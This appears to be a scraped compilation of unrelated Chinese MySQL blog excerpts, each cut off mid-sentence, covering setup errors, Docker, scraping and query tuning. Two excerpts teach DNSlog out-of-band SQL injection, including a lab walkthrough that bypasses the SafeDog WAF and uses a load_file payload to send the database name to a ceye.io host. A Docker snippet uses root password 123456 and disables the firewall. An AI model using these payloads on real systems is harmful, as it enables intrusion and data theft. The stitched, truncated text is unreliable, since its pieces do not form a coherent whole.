mysql

记录一个错误： 修复系统漏洞后，重启电脑，wamp没有开机自启动，手动启动后发现，图标是大红色变成了橙色，也就是服务未完全启动（1/2）状态。 ??? 但是我其实也不知道是哪个服务（Apache/MySQL?）未成功启动，所以浏览器访问 127.0.0.1/发现安装时出现的界面还是出现了，只是下面有一项错误。不过，，这个其实是warning，之前也出现过，不妨碍启动。 然后我想起来我电脑在装wamp之前是有MySQL的，为了验证，我停止了wamp上的服务，打开任务管理器，还有MySQL服务在运行，那么wamp中的数据库服务就启动不了了，3306端口已被占用，手动结束该服务后，重启wamp服务，果然，绿了！ 有几个解决办法：要么卸了之前的MySQL，要么改一下MySQL端口号避免冲突，要么关掉MySQL服务的开机自启动方式。 鉴于工作和学习需要，将原MySQL设置成手动启动方式，wamp下的Apache和MySQL暂时保持手动启动方式，将wamp应用添加到了开启启动的程序里，参考 经验 。 来源： oschina 链接： https://my.oschina.net/u/4328287/blog/3451330

更改表字段 `ALTER TABLE table_name ADD column field_name int NULL comment '整定值' AFTER field_name [,add foreign key (omt_setting) references d9Setting (set_id) ];` mysql show processlist 显示哪些线程正在运行。但数据量大或者锁表是可以通过此词语来查看。 kill id 结束正在进行的进程 来源： oschina 链接： https://my.oschina.net/u/3312696/blog/1924407

sql注入中利用的骚姿势你又知道几个？ DNSLog外带注入和DNSlog带外注入？（OOB） 其实是一样的，叫法不同！本人还是习惯叫外带注入，自我感觉，比较顺口 为什么需要外带注入？ 当我们对一个数据库进行注入时，无回显，且无法进行时间注入，那么就可以利用一个通道，把查询到数据通过通道带出去，这里的通道包括： http请求、DNS解析、SMB服务等将数据带出。 of course！这里主讲DNSlog外带注入 mysql-DNSlog外带注入： 利用条件： 1. mysql.ini 中 secure_file_priv 必须为空。 ( ps. 修改mysql.ini 文件，在[mysqld] 下加入 secure_file_priv = ) mysql 新版本下secure-file-priv字段 ：secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 当secure_file_priv的值为null ，表示限制mysqld 不允许导入|导出 当secure_file_priv的值为/tmp/ ，表示限制mysqld 的导入|导出只能发生在/tmp/目录下 当secure_file_priv的值没有具体值时，表示不对mysqld 的导入|导出做限制 2.

测试一些网站的时候，一些注入都是无回显的，我们可以写脚本来进行盲注，但有些网站会ban掉我们的ip，这样我们可以通过设置ip代理池解决， 但是盲注往往效率很低，所以产生了DNSlog注入。具体原理如下。 首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上，这时就能够实时地监控域名查询请求了，图示如下。 DNS在解析的时候会留下日志，咱们这个就是读取多级域名的解析日志，来获取信息 简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息。 这样说原理很抽象，下面通过实际例子看下。 1.DNSLog平台 0x01SQL盲注 就以sql盲注为例。深入理解下DNSlog注入过程： 通过DNSlog盲注需要用的load_file()函数，所以一般得是root权限。 show variables like '%secure%'; 查看load_file()可以读取的磁盘。 1、当secure_file_priv为空，就可以读取磁盘的目录。 2、当secure_file_priv为G:\，就可以读取G盘的文件。 3、当secure_file_priv为null，load

首先进入靶场： http://59.63.200.79:8014/index3.php 利用平台：ceye.io 然后加入？Id=1以及一系列单引号，and order sleep()之类的测试发现好多都被禁止。 根据阿帕奇服务的白名单机制绕过安全狗，在?id=1之前加/1.txt http://59.63.200.79:8014/index3.php/1.txt?id=1%20and%20sleep(10 ) 发现sleep()函数被执行了，安全狗被绕过。 然后使用load_file()函数进行mysql-dns注入：59.63.200.79:8014/index3.php/1.txt?id=1 and (select load_file(concat(‘//‘,(select database()),’.ergl65.ceye.io/abs’))) 需要注意的点： 中间连接需要用and 而且后面的select查询语句需要使用括号括起来，这是我做时的两个需要注意的点。 现在知道了库名为mangzhu,接着使用联合查询查表名、字段名： (select load_file(concat(‘//‘,(select table_name from information_schema.tables where table_schema=database() limit 0,1),’

本文转自： https://blog.csdn.net/qq_19348391/article/details/82998391 Docker学习之一：注册Docker Hub账号 Docker学习之二：Docker基本简单操作命令 Docker学习之三：Docker在linux下简单安装使用 Docker学习之四：使用docker安装mysql，碰到了一个启动的坑 第一步，从docker中拉取MySQL镜像 $ sudo docker pull mysql $ sudo docker images 第二步，创建并启动一个MySQL容器 $ sudo docker run --name mysql -e MYSQL_ROOT_PASSWORD=123456 -p 3306:3306 -d mysql 查看容器运行状态： $ sudo docker ps 第三步，测试连接MySQL 这里我使用navicat远程连接，连接MySQL前需要防火墙开放端口或者关闭防火墙。 开放端口： $ sudo firewall-cmd --add-port=3306/tcp 关闭防火墙： $ sudo systemctl stop firewalld 我这边使用MySQL Workbench 连接测试 使用客户端链接的时候报错 连接Docker启动的mysql出现：ERROR 2059 (HY000)

本文转载自:https://www.makcyun.top/web_scraping_withpython2.html 需要学习的地方: (1)read_html的用法 作用:快速获取在html中页面中table格式的数据 (2) to_sql 的用法 将获得的DataFrame数据写入数据表中 (3)使用 urlencode 构造所需的url参数 摘要： 我们平常在浏览网页中会遇到一些表格型的数据信息，除了表格本身体现的内容以外，你可能想透过表格再更进一步地进行汇总、筛选、处理分析等操作从而得到更多有价值的信息，这时可用python爬虫来实现。本文采用pandas库中的read_html方法来快速准确地抓取表格数据。 本文知识点： Table型表格抓取 DataFrame.read_html函数使用 爬虫数据存储到mysql数据库 Navicat数据库的使用 1. table型表格 我们在网页上会经常看到这样一些表格，比如： QS2018世界大学排名 ： 财富世界500强企业排名 ： IMDB世界电影票房排行榜 ： 中国上市公司信息 ： 他们除了都是表格以外，还一个共同点就是当你点击右键-定位时，可以看到他们都是table类型的表格形式。 从中可以看到table类型的表格网页结构大致如下： < table class= "..." id= "..."> < thead> < tr

来源： 编码砖家 https://www.cnblogs.com/xiaoyangjia/p/11267191.html 博主负责的项 目主要采用阿里云数据库MySQL，最近频繁出现慢SQL告警，执行时间最长的竟然高达5分钟。 导出日志后分析，主要原因竟然是没有命中索引和没有分页处理。 其实这是非常低级的错误，我不禁后背一凉，团队成员的技术水平亟待提高啊。 改造这些SQL的过程中，总结了一些经验分享给大家，如果有错误欢迎批评指正。 MySQL性能 最大数据量 抛开数据量和并发数，谈性能都是耍流氓。MySQL没有限制单表最大记录数，它取决于操作系统对文件大小的限制。 《阿里巴巴Java开发手册》提出单表行数超过500万行或者单表容量超过2GB，才推荐分库分表。性能由综合因素决定，抛开业务复杂度，影响程度依次是硬件配置、MySQL配置、数据表设计、索引优化。500万这个值仅供参考，并非铁律。 博主曾经操作过超过4亿行数据的单表，分页查询最新的20条记录耗时0.6秒，SQL语句大致是 select field_1,field_2 from table where id < #{prePageMinId} order by id desc limit 20 ，prePageMinId是上一页数据记录的最小ID。 虽然当时查询速度还凑合，随着数据不断增长，有朝一日必定不堪重负

今天在 测试 MySQL 的连接时候，发现连接不通过，并报错 ERROR 2003 (HY000): Can't connect to mysql server on '192.168.10.210' (111) 测试代码： require ' mysql2 ' client = Mysql2::Client.new(:host=> " 192.168.10.210 ",:username=> ' root ',:password=> " root " ) puts results = client.query( " show databases; ") 谷歌了一下之后，原来是在mysql的my.cnf中有下面一段代码： # Instead of skip- networking the default is now to listen only on # localhost which is more compatible and is not less secure. bind-address = 127.0. 0.1 #这里默认监听本地localhost 如果要让mysql监听到其他的地址，可以将 bind-address = 127.0.0.1 注释掉。 或者将 bind-address = 0.0.0.0 监听所有的地址 屏蔽掉之后再次运行代码又出现： Host '192